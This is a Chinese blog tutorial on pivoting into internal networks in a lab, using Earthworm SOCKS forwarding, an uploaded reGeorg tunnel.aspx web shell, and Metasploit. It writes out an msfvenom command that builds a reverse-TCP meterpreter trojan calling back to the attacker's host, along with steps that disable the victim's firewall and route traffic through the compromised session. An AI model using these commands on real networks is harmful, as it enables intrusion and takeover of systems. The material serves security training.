当前位置:   article > 正文

内网转发——反弹代理_127.0.0.1 代理反弹

127.0.0.1 代理反弹

内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。所以出现了反弹代理,也叫反弹socket

实验一:利用Earthworm实现内网代理转发

实验1:正向代理

实验环境 :win2008  网卡一:10.1.1.1 

                                  网卡二:192.168.140.131

                   win2003:10.1.1.2

实验步骤:

1.将ew工具的ew_for_Win.exe程序上传到win2008服务器
2.进入ew工具的所在位置,设置代理:ew.exe -s ssocksd -l 800

  

3.访问受害者win2003的网页,即可访问到

  

4.外网想要访问受害者网页,也可通过bp添加代理,

5.之后选择刚添加的代理,直接访问内网的ip即可访问到网页的内容

6.如果想要访问远程桌面,则可利用工具proxifier添加代理服务器,即可连接   

    

7.如果在linux上设置代理,则可在浏览器设置代理,如下图,设置完成后即可访问目标主机的网页

    

8.kali中也可用proxychains工具,修改其配置文件,gedit /etc/proxychains.conf,在里边添加代理

    

9.之后输入:proxychains rdesktop 10.1.1.2就可通过代理进行远程连接

  

实验二:ew高级用法反向代理

实验环境 :主机A:物理机
                   主机B:win2008

实验步骤:

1.先在一台具有公网ip的主机A上运行以下命令:

ew.exe -s rcsocks -l 1080 -e 8888

  

2.在目标主机B上启动SOCKS v5 服务 并反弹到公网主机的8888端口

ew.exe -s rssocks -d 攻击者ip -e 8888

  

  

3.在主机A上添加代理服务器,127.0.0.1:1080,即可进行远程连接

  

  

实验三:ew工具进阶—正向反弹代理

实验环境:攻击机 A:物理机
                      win8B:网卡一:192.168.140.131
                                   网卡二:10.1.1.1
                      win3C: 网卡一:10.1.1.2
                                  网卡二:172.16.1.1
                      linuxD:172.16.1.2

实验步骤:

1.关闭受害者D的防火墙:service iptables stop

  

2.在内网边界机C上设置端口代理:ew.exe -s ssocksd -l 8000

  

3.在win8上做端口转发:

ew -s lcx_tran -l 1080 -f win3受害者ip -g 8000

  

4.利用proxifier添加代理服务器,ip为win8B的ip,1080端口

  

5.之后便可进行远程访问

实验四:ew工具进阶—反向反弹代理

实验环境:攻击机A:物理机
                     win8B:网卡一:192.168.140.131
                                   网卡二:10.1.1.1
                     win3C: 网卡一:10.1.1.2
                                 网卡二:172.16.1.1
                     linuxD:172.16.1.2

实验步骤:

1.攻击机A开启监听端口:ew.exe  -s lcx_listen -l 1080 -e 8888

2.内网边界机win3C将9999端口进行转发:ew.exe -s ssocksd -l 9999

3.内网边界机win8B将内网边界机win3C与攻击机连接起来:

ew -s lcx_slave -d 攻击机ip -e 8888 -f 内网边界机win3C的ip -g 9999

4.攻击机借助proxifier工具配置攻击机机器的代理:127.0.0.1:1080

5.之后便可进行远程访问

实验二:利用reGeorg工具进行反弹代理

实验环境:攻击机kali:192.168.140.137

               边界机win8:192.168.140.131

                                    10.1.1.1

               受害机win3:10.1.1.2

实验步骤:

1.kali机子装上有regeo软件

2.在win2008的wwwroot目录下上传tunnel.aspx文件

3.kali命令行输入:python reGeorgSocksProxy.py -u http://192.168.140.131/tunnel.aspx,可看到开启本地的8888端口

  

4.修改其配置文件:gedit /etc/proxychains.conf,将其代理改为本地的8888端口

  

5.利用代理连接受害者机子: proxychains rdesktop 10.1.1.2,便可进行远程访问

  

实验三:利用msf工具进行反弹代理

、实验环境:

实验步骤:

1.选择适合的payload,此处选择 user windows/x64/meterpreter_reverse_tcp

2.制作木马 

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.140.137 lport=4444 -f exe -o 1.exe


 

3.将木马上传到边界机win8上

4.进入管理工具:use exploit/multi/handler

5.设置paload:set payload windows/x64/meterpreter_reverse_tcp

6.配置IP:set lhost 本机ip

7.指行win8上的程序文件,并执行管理工具:exploit ,启动4444端口的监听

8.跳到后台:background,可通过sessions 1返回

9.添加路由:route 10.1.1.1 255.0.0.0 1,最后的1是代表走session 1

10.查看路由:route print

  

11.利用路由生成代理端口,切换模块:use auxiliary/server/socks4a(该模块是用来做代理的模块)
    执行exploit -y   -y是指将其放到后台去执行

  

12.查看监听端口情况,发现1080已经开启

  

13.修改配置文件,注意改为socks4

14.输入proxychains rdesktop 10.1.1.2进行远程连接

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/470623
推荐阅读
相关标签
  

闽ICP备14008679号